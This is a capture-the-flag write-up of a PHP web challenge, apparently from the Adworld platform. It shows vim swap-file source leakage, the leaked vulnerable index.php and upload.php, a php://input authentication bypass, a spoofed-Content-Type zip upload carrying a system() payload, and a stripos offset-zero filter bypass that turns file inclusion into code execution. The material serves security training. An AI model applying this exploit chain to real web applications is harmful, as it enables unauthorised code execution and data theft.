攻防世界-web-ctf 1

Challenge: 工控云管理系统客服中心期待您的反馈 (ICS cloud management system customer service center looks forward to your feedback)
Challenge text: the ICS cloud management system customer service center has a vulnerability; the flag is in flag/flag/flag/flag/flag/flag/flag.php. http://47.104.188.226:20001 Find this hidden file. swp? No no no... keep looking...
Hmm, this one is a source-code leak as well...
From now on, when I get a challenge and have no idea where to start, I'll first try every place that could leak source...

```text
http://47.104.188.226:20001/.index.php.swp
http://47.104.188.226:20001/.index.php.swo
http://47.104.188.226:20001/.index.php.swn
```
These are the vim swap files left behind when index.php was edited in place; fetching them gives us the source of index.php:

```php
<?php
error_reporting(0);
ini_set('open_basedir', '/var/www/html');

function autoload($page) {
    // Every filter below is written as stripos(...) > 0. A match at offset 0
    // returns 0, and 0 > 0 is false, so a banned word at the very start of
    // the query string is not caught.
    if (stripos($_SERVER['QUERY_STRING'], 'flag') > 0) {
        die('no flag flag flag flag !');
    }
    if (stripos($_SERVER['QUERY_STRING'], 'uploaded') > 0) {
        die('no uploaded uploaded uploaded uploaded !');
    }
    if (stripos($_SERVER['QUERY_STRING'], '://f') > 0) {
        die('no ://f ://f ://f');
    }
    if (stripos($_SERVER['QUERY_STRING'], 'ata') > 0) {
        die('no ata ata ata');
    }
    if (stripos($_SERVER['QUERY_STRING'], '0') > 0) {
        die('no 0 0 0');
    }
    // local file inclusion: $page comes straight from ?page=
    if (file_exists("./includes/$page.php")) {
        include "./includes/$page.php";
    } elseif (file_exists("./includes/$page")) {
        include "./includes/$page";
    } else {
        echo "File is not exit ";
    }
}

function download($adfile, $file) {
    //Only Administrators can download files .
    // $adfile is handed to file_get_contents() unchanged, so any readable
    // stream wrapper passes, including php://input (the raw POST body).
    $cert = 'N';
    if (isset($adfile) && file_get_contents($adfile, 'r') === 'Yeah Everything Will Be Ok My Boss') {
        echo "Welcome ! You Are Administrator !";
        $cert = 'Y';
    } else {
        echo "error1";
    }
    if ($cert === 'Y') {
        if (stripos($file, 'file_list') != false) die('error4');
        // false >= 0 is true in PHP, so the else branch is unreachable
        if (stripos($file, 'file_list') >= 0) {
            header('Content-Description: File Transfer');
            header('Content-Type: application/octet-stream');
            header('Content-Disposition: attachment; filename=' . basename($file));
            header('Content-Transfer-Encoding: binary');
            header('Expires: 0');
            header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
            header('Pragma: public');
            header('Content-Length: ' . filesize($file));
            readfile($file);
        } else {
            die('error2');
        }
    } else {
        echo 'error3';
    }
}

if (!isset($_GET['page'])) {
    $page = 'index';
} else {
    $page = $_GET['page'];
}
if (stripos($page, './') > 0) {
    die('no ./ ./ ./ ./');
}
if (stripos($page, '://') > 0) {
    die('no :// :// ://');
}
autoload($page);

if (isset($_GET[admin]) && isset($_GET[file])) {
    if (stripos($_GET[admin], 'flag') > 0 || stripos($_GET[file], 'flag') > 0) {
        die('not flag flag flag falg !');
    }
    if (strlen($_GET[file]) >= 38) {
        die('too long');
    }
    download($_GET[admin], $_GET[file]);
}
?>
```
There is a file-download function in it, and you can only download after passing its "authentication", which is this part:

```php
if (isset($adfile) && file_get_contents($adfile, 'r') === 'Yeah Everything Will Be Ok My Boss') {
    echo "Welcome ! You Are Administrator !";
    $cert = 'Y';
}
```
This is bypassed with php://input: file_get_contents() accepts any stream wrapper, and php://input is the raw POST body, so a POST to index.php?admin=php://input&file=upload.php whose body is exactly Yeah Everything Will Be Ok My Boss (no trailing newline, the comparison is ===) sets $cert to 'Y'. The file parameter then hands upload.php to readfile(), so we can download it.

That gives us the source of upload.php:

```php
<?php
if (stripos($_SERVER['QUERY_STRING'], 'flag') > 0) {
    die('no flag flag flag flag !');
}
if (!empty($_FILES)) {
    //properties of the uploaded file
    $name  = $_FILES["filename"]["name"];
    $type  = $_FILES["filename"]["type"];
    $size  = $_FILES["filename"]["size"];
    $temp  = $_FILES["filename"]["tmp_name"];
    $error = $_FILES["filename"]["error"];
    // name: at most 5 characters, ending in zip/jpg/png; the './' and 'php'
    // checks share the stripos(...) > 0 flaw from index.php
    if (strlen($name) >= 6) {
        die('name is too long !');
    }
    if (stripos($name, './') > 0) {
        die('invalid parameter');
    }
    if (stripos($name, 'php') > 0) {
        die('invalid parameter');
    }
    if (substr($name, -3, 3) !== 'zip' && substr($name, -3, 3) !== 'jpg' && substr($name, -3, 3) !== 'png') {
        die('file can not upload ! ');
    }
    if ($error > 0) die("Error uploading file! code error.");
    else {
        // $type is the client-supplied Content-Type of the part, so it can be
        // set freely in the request; $size must stay <= 400 bytes
        if ($type !== "application/zip" || $size > 400)//condition for the file
        {
            die("Format not allowed or file size too big!");
        } else {
            if (file_exists('includes')) {
                move_uploaded_file($temp, "includes/uploaded/" . $name);
                echo "Upload complete a!";
                shell_exec('sh /var/www/html/includes/unzip.sh');
            } elseif (file_exists('uploaded')) {
                move_uploaded_file($temp, "uploaded/" . $name);
                echo "Upload complete!";
                shell_exec('sh /var/www/html/includes/unzip.sh');
            }
        }
    }
} else {
    // alternative read path: cat uploaded/<step> for a 20-character step value
    if (isset($_GET['step']) && strlen($_GET['step']) === 20) {
        if (stripos($_GET['step'], 'lag') > 0) {
            die('error');
        }
        if (stripos($_GET['step'], './') > 0) {
            die('error');
        }
        if (stripos($_GET['step'], ' ') > 0) {
            die('error');
        }
        if (stripos($_GET['step'], '/') > 0) {
            die('error');
        }
        if (preg_match('/[^\w\d_ -]/si', $_GET['step'])) {
            $_GET['step'] = preg_replace('/[^a-zA-Z0-9_ -]/s', '', $_GET['step']);
            die('error');
        }
        passthru('cat ' . 'uploaded/' . $_GET['step']);
    } else {
        die();
    }
}
?>
```
Reading through the source, there is a wall of checks, but it boils down to: you can upload a zip file, the file name can't be too long, and after the upload it runs unzip.sh. Visiting http://47.104.188.226:20001/includes/unzip.sh
gives us the script itself:

```sh
#/bin/bash
cd ./uploaded
find ./ -size +1M | xargs rm
cd ../
unzip -o ./uploaded/*.zip -d ./uploaded/
# after extraction: remove the archives, every file with a dot in its name,
# hidden files, and then every directory, so only plain dot-less files survive
rm -rf ./uploaded/*.zip
rm -rf ./uploaded/*.*
rm -rf ./uploaded/.*
cd ./uploaded
find -type d | xargs rm -rf
touch /var/www/html/includes/uploaded/index.php
chmod 000 /var/www/html/includes/uploaded/index.php
```
This script deletes every file whose name contains a dot, deletes directories, and finally creates an index.php with no permissions (chmod 000) so the upload directory can't be listed. So whatever we put inside the zip has to be a plain file with no dot in its name and not nested in a directory, otherwise it is wiped before we can include it.

So we create a file named 123 containing:

```php
<?php system('cat flag/flag/flag/flag/flag/flag/flag.php'); ?>
```
Zip it as 1.zip (the name has to be shorter than 6 characters and end in zip), upload it, intercept the request and change the part's Content-Type to application/zip (the archive also has to stay at or under 400 bytes); the upload and the unzip both succeed. What's left is to include that file to get the flag. index.php has the include (autoload), but it filters the query string for 'uploaded':

```php
function autoload($page) {
    if (stripos($_SERVER['QUERY_STRING'], 'flag') > 0) {
        die('no flag flag flag flag !');
    }
    if (stripos($_SERVER['QUERY_STRING'], 'uploaded') > 0) {
        die('no uploaded uploaded uploaded uploaded !');
    }
    if (stripos($_SERVER['QUERY_STRING'], '://f') > 0) {
        die('no ://f ://f ://f');
    }
    if (stripos($_SERVER['QUERY_STRING'], 'ata') > 0) {
        die('no ata ata ata');
    }
    if (stripos($_SERVER['QUERY_STRING'], '0') > 0) {
        die('no 0 0 0');
    }
    if (file_exists("./includes/$page.php")) {
        include "./includes/$page.php";
    } elseif (file_exists("./includes/$page")) {
        include "./includes/$page";
    } else {
        echo "File is not exit ";
    }
}
```
The check uses stripos, which returns the position of the first match, but positions are counted from 0: if the banned word sits at the very start of the query string, stripos returns 0, and 0 > 0 is false, so the check passes (and since it only reports the first occurrence, a second 'uploaded' later in the string is never seen). So we build http://47.104.188.226:20001/index.php?uploaded&page=uploaded/123
The query string now starts with 'uploaded', the filter is bypassed, ./includes/uploaded/123 is included, the payload runs and we get the flag.
